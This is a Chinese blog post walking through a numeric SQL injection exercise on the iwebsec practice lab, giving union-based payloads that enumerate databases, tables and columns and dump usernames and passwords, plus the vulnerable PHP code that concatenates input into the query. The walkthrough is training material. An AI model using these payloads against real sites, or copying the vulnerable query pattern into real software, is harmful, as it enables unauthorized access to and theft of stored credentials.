SQL注入漏洞 | 数字型

最新推荐文章于 2024-04-15 11:38:11 发布
最新推荐文章于 2024-04-15 11:38:11 发布
阅读量791 收藏 1
点赞数
分类专栏: web安全 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/128081451
版权

文章目录

前言

SQL注入漏洞 | iwebsec

MySQL 数字型

  1. 页面观察:测试看回显
    在这里插入图片描述

  2. 注入点判断:发现有sql注入漏洞

    AND 可在 where 子语句中把两个或多个条件结合起来。如果第一个条件和第二个条件都成立,则 AND 运算符显示一条记录。

    在这里插入图片描述

    在这里插入图片描述

  3. 判断当前表的字段数

    order by 语句用于根据指定的列对结果集进行排序。

  4. 判断显示位,需要让id的值为不可能的值,因为只能回显一次结果,id的结果不存在才会回显union语句的结果。

    union 操作符用于合并两个或多个 select 语句的结果集。union 内部的 select 语句必须拥有相同的列数。

    在这里插入图片描述

  5. 爆库名
    在这里插入图片描述

  6. 爆表名

    /sqli/01.php?id=-1 union select database(),2,group_concat(table_name) from information_schema.tables where table_schema=database()

    在这里插入图片描述

  7. 爆字段名

    /sqli/01.php?id=-1 union select database(),2,group_concat(column_name) from information_schema.columns where table_name=user

    在这里插入图片描述

  8. 爆相应字段的所有数据

    /sqli/01.php?id=-1 union select group_concat(id,'--'),2,group_concat(id,'--',username,'--',password,'--') from user

    在这里插入图片描述

  9. 看源码

    docker exec -it iwebsec bash
cat /var/www/html/sqli/01.php

    	......
<?php
	if(isset($_GET['id']))
	{
		$id=$_GET['id'];  //用户输入的参数
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";  //将用户输入的参数直接拼接在sql语句
		$result=mysql_query($sql);  //传入后台数据库进行查询,result为返回的查询结果
	}
	else
	{
		exit();
	}
?>
	......

    分析

    $id=0 union select 1,2,3
$sql="SELECT * FROM user WHERE id=0 union select 1,2,3 LIMIT 0,1";

    $sql的意思是将SELECT * FROM user WHERE id=0select 1,2,3的结果并在一起返回。但是由于LIMIT 0,1限制,只能返回一条,因此可以让前面的语句没有结果,那么就可以返回后面语句的结果了。

c4fx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我的白帽之路-SQL注入数字型注入【sqli-labs Less-2】
Offsett的博客
02-27 369
我的白帽之路
SQL注入漏洞
qq_43279943的博客
03-31 400
SQL注入漏洞漏洞原理注入类型漏洞检测单引号测试 漏洞原理 SQL注入是由于编辑代码的人员对用户提交参数没有进行一定的审核或者过滤机制不严格,导致用户可以对SQL语句进行重新构造,执行不在预期内的数据库命令,造成数据信息泄露的漏洞。 注入类型 SQL注入按照注入点参数分类通常分为字符型和数字型 字符型:select * from users where id = '1'; 数字型:select *...
第二章-SQL注入漏洞数字型注入+字符型注入)
qq_46055185的博客
12-21 1338
第二章-SQL注入漏洞(学习笔记)数字型注入字符型注入 数字型注入 数字型注入就是指注入点的数据类型为数字型,没有用单引号引起来。代码示例如下: 在WHERE id=$ id这个SQL语句的句子中,$id变量没有用单引号或者双引号一起来,而是直接拼接到了后面,这便是典型的数字型注入。 判断数字型注入的方法: 输入单引号,不正常返回: 如果用户提交index.php?id=1‘,那么后面的SQL语句就会变成SELECT*FROM users WHERE id=1’ LIMIT 0,1,SQL语句本身存
pikachu靶场第十六关——sqli数字型注入(post)(附代码审计)
最新发布
yzasts的博客
04-15 1134
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
SQL注入漏洞攻防
m0_59418948的博客
12-01 252
SQL注入漏洞攻防
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
sql注入数字型注入
08-02
检测数字型注入漏洞可以通过以下步骤: 1. 判断网站是否存在注入漏洞 2. 获取数据库名 3. 获取表名 4. 获取列名 5. 根据获取的数据库名、表名、列名来获得表内的信息 四、数字型注入实例 以 pikachu 靶场里的数字...
SQL注入漏洞挖掘.ppt
10-27
以下是对SQL注入漏洞的详细说明: ### SQL注入漏洞的易发位置 1. **登录框**:当用户输入的用户名和密码直接拼接到SQL查询中时,如果没有正确处理,可能导致注入。 2. **搜索框**:用户输入的搜索关键词可能被用作...
SQL注入漏洞全接触
12-09
SQL注入漏洞是Web应用程序安全领域的一个重要问题,它源于开发者在编写代码时未对用户输入数据进行充分的验证和过滤。当用户输入的数据被直接拼接到SQL查询语句中,攻击者可以通过精心构造的输入来执行非预期的...
S-CMS PHP v30存在SQL注入漏洞1
08-03
例如,一个成功的数据包会导致回显"20151019102732946.jpg",而错误的数据包则不会,这表明这是一个布尔型的SQL注入漏洞,攻击者可以通过返回结果的真伪来判断SQL语句的执行情况。 二、利用方法 攻击者可以编写POC...
5-2从一个数字型注入认识sql注入漏洞
山兔的博客
04-30 2272
SQL Inject 漏洞-注入点类型-数字类型判断 我们切换到pikachu的平台上面来,选择数字型注入,我们先看一下,他有什么功能 他应该是用post方式提交的,因为他没有在url里面传参 测试sql注入的时候,我们一定要去想象,这个功能提交到后台,后台是怎么操作的,我们可以在我们的大脑里面去想象一下,后台到底是怎么操作的 正常来说,用户的数据是存在数据库里面的,当我们提交1到后端的时候,后端应该是从数据库里面去做查询 所以它后端逻辑是这样的 select 字段1,字段2 from 表名 where
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6328
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞
MySQL-数字类型自增是真的坑
weixin_45893571的博客
05-06 1241
在进行表结构设计时,数字类型是最为常见的类型之一,但要用好数字类型并不如想象得那么简单,比如: 怎么设计一个互联网海量并发业务的自增主键?用 INT 就够了? 怎么设计账户的余额?用 DECIMAL 类型就万无一失了吗? 以上全错! 数字类型看似简单,但在表结构架构设计中很容易出现上述“设计上思考不全面”的问题(特别是在海量并发的互联网场景下) 数字类型 整数类型 MySQL 数据库支持 SQL 标准支持的整型类型:INT、SMALLINT。此外,MySQL 数据库也支持诸如 TINYINT、M
网络安全——SQL注入漏洞
热门推荐
weixin_54055099的博客
09-08 1万+
SQL注入基本知识和SQL注入基本流程,sqli-labs
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lifeng_dc的博客
01-22 3265
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1534
SQL注入原理-数值型注入
sql注入漏洞修复方法
05-18
SQL注入漏洞是常见的Web应用程序安全漏洞之一。为了修复这个漏洞,可以采取以下几个方法: 1. 使用预处理语句:使用预处理语句可以防止SQL注入攻击。预处理语句在执行SQL语句之前预先编译它们,然后将参数与编译好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值